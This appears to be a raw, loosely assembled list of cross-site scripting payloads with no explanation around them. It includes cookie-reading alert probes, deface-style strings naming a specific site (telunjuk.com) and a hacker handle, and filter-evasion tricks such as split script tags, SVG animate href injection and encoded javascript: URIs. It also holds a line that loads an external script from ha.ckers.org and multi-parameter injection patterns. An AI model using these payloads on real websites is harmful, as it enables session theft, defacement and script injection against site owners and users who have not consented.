payload

"><script>prompt("XSS Vulnerability At telunjuk.com")</script>
</script><svg/onload=confirm(/Cross-Site-scripting Xss at telunjuk.com/)>
"><script>alert(document.cookie)</script>
'-alert.call(window,'Xss telunjuk.com')-'
-TEST<br><br><center><font color="red">HackedByMrZh33v<br><br><img src=x onclick=alert(document.cookie)><br><br><img src=x onclick=alert(document.domain)>
<script>alert(document.cookie);</script>
<script>alert(document.domain);</script>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
%%html
<! XSS="><img src=xx:x onerror=confirm(document.domain)//">"
"><img src=y onerror=confirm(1)>
<a href="/dom/dom.php?p=Hello.">Case 25 - DOM Injection via URL parameter (by server + client)</a>
<a href="/dom/sinks.html?name=KNOXSS">Case 26 - DOM Injection via URL Parameter (Document Sink)</a>
<a href="/dom/sinks.html?redir=sinks.html">Case 27 - DOM Injection via Open Redirection (Location Sink)</a>
<a href="/dom/sinks.html?index=NASDAQ">Case 28 - DOM Injection via URL Parameter (Execution Sink)</a>
<a href="/tests/cors/#home.html">Case 29 - DOM Injection via AJAX in URL Fragment (Document Sink)</a>
<a href="/blind/text2.php">Stored Text - Victim's Triggering</a>
<a href="/blind/text1.php">Stored Text - Attacker's Input</a>
<a href="/session/">XSS After Login</a>
<a href="/multi/double-mixed.php?p=1">-TEST<br><br><center><font color="red">CrossSiteScripting<br><br><img src=x onclick=alert(document.cookie)><br><br><img src=x onclick=alert(document.domain)> + "><script>prompt("XSS Vulnerability At telunjuk.com")</script></a>
<a href="/multi/js-object3.php?p=1">Case 19 - Quoteless Inline Double Injection in JS object with Nested Function</a>
<a href="/multi/js-object2.php?p=1">Case 18 - Quoteless Inline Double Injection in JS object with Nested Array</a>
<a href="/xss.php?b1=1">Case 03 - Inline HTML Injection with Double Quotes (b1)</a>
<svg/onload=alert(/XSS/.source)>.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<center><H1>HTML-Injection-Test</H1><img/src="http://secgeek.net/images/logo.png"/width="400"/height="300"><br><h2/style="font-size:30px;color:red">Warning</h2><br><img/src=//secgeek.net/images/fake.png>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<script>alert(1);</script>
<svg><a><rect width=100% height=100%>
<svg><a><rect width=100% height=100%><animate attributeName=width from=0 to=100% dur=2s>
<svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>
<svg><a><rect width=100% height=100%><animate attributeName=href from=//google.com to=?>
<animate attributeName=href to=javascript:alert(1)>
<animate attributeName=href from=javascript:alert(1) to=?>
<svg><a><rect width=100% height=100% /><animate attributeName=href to=javas&#99ript:alert(1)>
<svg width=12cm height=9cm><a><image href=//brutelogic.com.br/yt.jpg /><animate attributeName=href values=javas&#99ript:alert(1)>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<tag handler=code>
<b onclick=alert(1)>click me!
<img src=x onerror=alert(1)>
<svg onload=alert(1)>click me!
<frameset><frame src onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=write(1)>
1) p=’onload=alert(1)><svg/1=’

‘onload=alert(1)><svg/1=’

… [code] …

‘onload=alert(1)><svg/1=’
1) p=’>alert(1)</script><script/1=’
or
2) p=*/alert(1)</script><script>/*

*/alert(1)</script><script>/*

… [code] …

*/alert(1)</script><script>/*

1) p=*/alert(1)”>’onload=”/*<svg/1=’
or
2) p=`-alert(1)”>’onload=”`<svg/1=’


`-alert(1)”>’onload=”`<svg/1=’

… [code] …

`-alert(1)”>‘onload=”`<svg/1=’

… [code] …

`-alert(1)”>‘onload=”`<svg/1=’

 
1) p=*/</script>’>alert(1)/*<script/1=’

*/</script>’>alert(1)/*<script/1=’

… [code] …

*/</script>‘>alert(1)/*<script/1=’

… [code] …

*/</script>‘>alert(1)/*<script/1=’
p=<svg/1=’&q=’onload=alert(1)>
p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
var n = {a: “$p”, b: “$p”};
var n = {a: “$p”, b: “$q”};
p=-alert(1)}//\
var n = {a: “-alert(1)}//\”, b: “-alert(1)}//\”};
p=\&q=-alert(1)//